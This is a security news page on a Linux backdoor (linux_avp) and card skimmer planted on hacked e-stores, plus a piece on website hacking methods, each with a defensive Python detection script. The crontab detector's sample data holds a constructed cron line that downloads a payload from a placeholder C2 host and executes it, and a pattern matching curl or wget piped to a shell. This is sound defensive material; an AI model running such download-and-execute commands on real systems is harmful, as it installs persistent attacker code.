
Threat Actors Deploy Linux Backdoor on Hacked E-Stores with Software Skimmer


Cybersecurity researchers have uncovered a new hacking strategy that deploys a Linux backdoor on hacked e-commerce servers and exfiltrates customers' personal information, including credit card details. 

According to Sansec researchers, the hackers started with automated e-commerce attack probes, testing for dozens of vulnerabilities in e-commerce websites. As soon as one is spotted, the attackers use a PHP-coded web skimmer to download and insert fake payment forms into the checkout pages that the hacked online business displays to its customers.

“We found that the attacker started with automated eCommerce attack probes, testing for dozens of weaknesses in common online store platforms. After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data,” the Sansec threat research team stated. 

The Golang-based malware, which was unearthed on the same site by Dutch cyber-security firm Sansec, was downloaded and executed on infiltrated servers as a linux_avp executable. Once deployed, it immediately removes itself from the disk and disguises itself as a "ps -ef" process, the command normally used to list the currently running processes.

While examining the linux_avp backdoor, the researchers discovered that it waits for commands from a Beijing server on Alibaba's network. Additionally, the malware gains persistence by inserting a new crontab entry that re-downloads the malicious payload from its command-and-control server and reinstalls the backdoor if it is detected and removed, or if the server restarts.

Unfortunately, this backdoor remains undetected by anti-malware engines on VirusTotal even though a sample was first uploaded more than one month ago, on October 8th. The uploader might be the linux_avp designer since it was submitted one day after researchers discovered it while examining the e-commerce site breach.

“Curiously, one individual had submitted the same malware to VirusTotal on Oct 8th with the comment ‘test’. This was just one day after the successful breach of our customer’s store. The person uploading the malware could very well be the malware author, who wanted to assert that common antivirus engines will not detect their creation,” said researchers.
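Two of the behaviours described above leave host-level traces a defender can check for: a binary that deletes itself after starting still shows up in /proc with an exe link ending in "(deleted)" while its command line claims to be "ps -ef", and crontab-based persistence needs a line that both downloads and executes something. The following script is an added example, not Sansec's tooling or the malware itself; the process snapshot, the crontab lines and the C2 hostname in it are constructed placeholders.

```python
import os
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Proc:
    pid: int
    cmdline: str  # /proc/<pid>/cmdline with NUL separators replaced by spaces
    exe: str      # target of the /proc/<pid>/exe symlink


def snapshot_procs() -> List[Proc]:
    """Read the live process table from /proc (Linux only).

    Entries that disappear or are unreadable while we iterate are skipped."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue
        procs.append(Proc(int(entry), cmdline, exe))
    return procs


def masquerading_procs(procs: List[Proc]) -> List[Proc]:
    """Flag processes whose argv[0] claims to be `ps` but whose executable is not
    the real ps binary. A binary that deleted itself after starting has an exe
    link that ends in ' (deleted)'."""
    flagged = []
    for p in procs:
        argv = p.cmdline.split()
        if not argv or argv[0].rsplit("/", 1)[-1] != "ps":
            continue
        exe_name = p.exe.rsplit("/", 1)[-1]
        if p.exe.endswith(" (deleted)") or exe_name != "ps":
            flagged.append(p)
    return flagged


# A cron line is suspicious when it fetches from the network AND runs the result.
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
RUNNER = re.compile(r"\|\s*(sh|bash)\b|chmod\s+\+x|&&")


def persistence_cron_lines(lines: List[str]) -> List[str]:
    """Return crontab lines matching the re-download-and-reinstall pattern."""
    hits = []
    for line in lines:
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if DOWNLOADER.search(s) and RUNNER.search(s):
            hits.append(s)
    return hits


# Constructed sample data (not captured from a real host): one genuine `ps -ef`,
# one self-deleted binary masquerading as `ps -ef`, and a cron job that re-fetches
# a payload from a placeholder C2 host and runs it.
SAMPLE_PROCS = [
    Proc(1, "/sbin/init", "/usr/lib/systemd/systemd"),
    Proc(4242, "ps -ef", "/tmp/linux_avp (deleted)"),
    Proc(4300, "ps -ef", "/usr/bin/ps"),
]
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/5 * * * * curl -s http://c2.example.invalid/linux_avp -o /tmp/linux_avp "
    "&& chmod +x /tmp/linux_avp && /tmp/linux_avp",
]


def run_checks(procs: List[Proc] = SAMPLE_PROCS,
               cron: List[str] = SAMPLE_CRON) -> Tuple[List[int], List[str]]:
    """Run both checks and return (suspicious pids, suspicious cron lines)."""
    return [p.pid for p in masquerading_procs(procs)], persistence_cron_lines(cron)


if __name__ == "__main__":
    pids, cron_hits = run_checks()
    print("masquerading pids:", pids)
    print("persistence cron lines:", cron_hits)
    # Against a live host: run_checks(snapshot_procs(), open("/etc/crontab").read().splitlines())
```

The crontab check only looks at lines you pass in, so feed it every crontab that matters (per-user files under /var/spool/cron as well as /etc/crontab and /etc/cron.d); the process check is deliberately narrow and will not catch a binary that picks a different name to hide behind.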

Here's A Quick Look Into Some Interesting Facts About Website Hacking


How many websites are hacked every day? How frequently do hackers attack? Are there any solutions to fix the vulnerabilities? Which are the most hacked websites? These are some basic questions that arise in the reader’s mind. So, in this article, you will get to know the latest statistics regarding website hacking.

Sadly, cyber-attacks are the harsh reality of today's world and have become so rampant that it is impossible to count the number of attacks. It requires thorough research, manpower, time, equipment and money to conduct a global study that reaches out to millions of people and organizations.

Number of websites hacked in a year

You will be surprised to know that nearly 1.2 billion sites are running across the globe. It is such a large web that it is impossible to keep watch over. Google's Safe Browsing tries to alert users about malicious websites and currently conveys nearly 3 million warnings per day. Out of those 1.2 billion sites, between 1% and 2% show some indicator of compromise (IoC) pointing to a website attack.

According to a recent study, nearly 66% of organizations are not equipped to handle cyber-attacks, nor the financial or reputational damage of a security breach. Threat actors install malware on sites, and such websites get excluded by firms like Google every day.

Different methods of hacking the websites

Threat actors generally use three methods to hack a website:

• Access control 

• Software vulnerabilities

• Third-party integrations

Access control refers specifically to the processes of authentication and authorization; in simple terms, how you log in. Login does not only mean your website's login form; it also covers the many interconnected logins tied together behind the scenes. Threat actors generally use brute force attacks, guessing possible username and password combinations until they can log in as the user.

Software vulnerabilities are the most reliable method for hackers to breach security. Threat actors discover vulnerabilities in the website's application code, web development framework and operating system, and use Remote Code Execution (RCE) to take over the website.

Threat actors also hack websites through third-party integrations. They exploit a vulnerability in a third party's servers and use it as a doorway to gain access to your website. These can involve any service you use alongside your website and its hosting.
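The brute force attacks mentioned under access control are visible in ordinary web server logs as a burst of failed login POSTs from one address. The script below is an added example (not code from this article) that finds such bursts with a sliding time window over common-log-format lines; it assumes the application answers a failed login with HTTP 401 and that the login form is posted to /login, and the log lines it checks are constructed, not from a real server.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Common log format: ip ident user [timestamp] "METHOD path proto" status bytes
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def failed_login_bursts(lines: List[str], login_path: str = "/login",
                        window: timedelta = timedelta(minutes=5),
                        threshold: int = 10) -> Dict[str, int]:
    """Return {ip: failures} for every IP with at least `threshold` failed logins
    inside some sliding `window`. Assumes a failed login is logged as a POST to
    `login_path` with status 401."""
    fails = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the expected log format; ignore
        if m["method"] != "POST" or m["path"] != login_path or m["status"] != "401":
            continue
        fails[m["ip"]].append(datetime.strptime(m["ts"], TS_FMT))

    bursts: Dict[str, int] = {}
    for ip, times in fails.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            # move the window start forward until the span fits inside `window`
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[ip] = best
    return bursts


def _line(ip: str, ts: datetime, status: int, path: str = "/login") -> str:
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "POST {path} HTTP/1.1" {status} 512'


# Constructed sample log (not from a real server): twelve failures in under three
# minutes from one address, two spaced-out failures plus a success from another,
# and one malformed line that the parser must skip.
_BASE = datetime(2021, 11, 20, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    [_line("203.0.113.5", _BASE + timedelta(seconds=15 * i), 401) for i in range(12)]
    + [_line("198.51.100.7", _BASE + timedelta(seconds=60 * i), 401) for i in range(2)]
    + [_line("198.51.100.7", _BASE + timedelta(seconds=200), 302)]
    + ["this line is not in log format and is ignored"]
)

if __name__ == "__main__":
    for ip, n in failed_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} failed logins within 5 minutes; rate-limit or lock out")
```

Tune `window` and `threshold` to the site's normal traffic before acting on the output, and pair the detection with a mitigation such as rate limiting or temporary lockout rather than relying on the alert alone.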

3 simple techniques to protect your website

• Keep track of frequently compromised vulnerabilities. Every security patch will make it harder for hackers to target your website. 

• Use a Web Application Firewall to limit the exploitation of software vulnerabilities. The firewall also acts as a shield between incoming web traffic and software that has not yet been patched.

• Take the guidance of certified security professionals who manage regular security audits.